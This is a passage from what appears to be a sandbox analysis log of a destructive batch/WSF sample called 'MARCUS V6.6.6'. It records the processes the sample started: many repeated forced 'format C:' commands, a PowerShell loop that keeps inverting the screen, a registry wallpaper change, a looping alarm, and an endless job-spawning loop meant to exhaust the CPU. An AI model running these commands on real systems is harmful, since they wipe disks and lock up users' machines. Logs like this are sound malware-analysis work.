                                                                                                            • C:\Windows\system32\mode.com
                                                                                                              mode 85,30
                                                                                                              2⤵
                                                                                                                PID:4272
                                                                                                              • C:\Windows\system32\wscript.exe
                                                                                                                wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                2⤵
                                                                                                                  PID:668
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                  2⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4276
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                  2⤵
                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                  PID:4676
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4680
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline"
                                                                                                                    3⤵
                                                                                                                      PID:1960
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                  1⤵
                                                                                                                    PID:1356
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp 1250
                                                                                                                      2⤵
                                                                                                                        PID:3948
                                                                                                                      • C:\Windows\system32\mode.com
                                                                                                                        mode 85,30
                                                                                                                        2⤵
                                                                                                                          PID:952
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                          2⤵
                                                                                                                            PID:1516
                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                            2⤵
                                                                                                                              PID:712
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                              2⤵
                                                                                                                                PID:4004
                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                2⤵
                                                                                                                                  PID:3428
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                  2⤵
                                                                                                                                    PID:5532
                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                    2⤵
                                                                                                                                      PID:3700
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                      2⤵
                                                                                                                                        PID:4196
                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                        2⤵
                                                                                                                                          PID:4960
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                          2⤵
                                                                                                                                            PID:188
                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                            2⤵
                                                                                                                                              PID:2428
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                              2⤵
                                                                                                                                                PID:4412
                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                2⤵
                                                                                                                                                  PID:5564
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5828
                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2864
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4984
                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5952
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2300
                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1848
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3556
                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:720
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2128
                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3672
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1164
                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4988
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5796
                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2776
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:764
                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3496
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3696
                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4756
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1312
                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4496
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:4192
                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2244
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:420
                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:956
                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2492
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3540
                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:564
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1300
                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2324
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3452
                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1740
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5040
                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:544
                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5308
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:2940
                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6052
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3952
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:2696
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:3764
                                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4432
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4676
                                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:1600
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:5908
                                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2620
                                                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3724
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2140
                                                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:668
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:4448
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5868
                                                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5004
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:3972
                                                                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:3948
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:3628
                                                                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1188
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2916
                                                                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                                                                • C:\Windows\system32\wscript.exe
                                                                                                                                                                                                                                                                                  wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2364
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:712
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\wscript.exe
                                                                                                                                                                                                                                                                                    wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:4772
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:784
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:908
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:440
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:5844
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:3764
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:3972
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:1704
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:4324
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:188
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:5112
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:4228
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:2344
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6256
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
